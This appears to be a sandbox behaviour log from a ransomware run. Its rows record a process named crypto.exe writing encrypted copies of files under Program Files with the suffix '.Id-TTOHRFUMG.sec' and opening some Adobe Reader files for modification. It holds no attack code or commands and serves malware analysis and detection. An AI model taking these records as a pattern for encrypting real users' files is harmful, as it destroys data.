File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\kcms.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\ktab.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00411_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSClient.Msg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LINEACT.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ConfirmExport.jtx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_LightSpirit.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\logo.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH01065_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\DataServices\+Connect to New Data Source.odc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.KR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jfxwebkit.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR25F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SMSS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\bg.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-execution.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR46B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBWZINT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_center.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBOXES.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpCmdRun.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\cpu.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\SPLASH.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Thatch.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_OliveGreen.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\OliveGreen.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLOGO.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\elevation_service.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\he.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jsound.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00543_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\INVITE.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ContemporaryPhotoAlbum.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Easter.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105600.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL095.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Gradient.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\mainimage-mask.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297229.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\javaws.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285780.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15056_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01044_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21400_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PROTTPLV.XLS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePageStyle.css.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBCALSO.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\MedianMergeLetter.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmlaunch.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogoBeta.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR1F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14833_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\DBGHELP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\manifest.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105286.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00046_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-execution.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107364.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15301_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\CASHREG.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\firefox.VisualElementsManifest.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DissolveAnother.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsBlankPage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\CAMERA.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\alt-rt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Sydney.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-loaders.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099198.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0295069.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21519_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\COUPON.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01239_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237228.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\macroprogress.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\WMM2CLIP.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUB6INTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STRBRST.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\atl.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14516_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\EXITEMS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\TimeCard.xltx.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Casual.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\AMERITECH.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Contacts.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBSBR.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00452_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSTORE_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-dialogs.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\clock.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\La_Paz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107358.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18224_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105240.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21376_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Custom.propdesc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_mr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\th.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Maputo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02400_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libspeex_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME47.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0214934.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Tasks.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00117_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105376.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198377.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239057.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293570.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.ID.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_ms.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jli.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\sunmscapi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01585_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01236_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\MENU98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley.Id-TTOHRFUMG.sec	crypto.exe
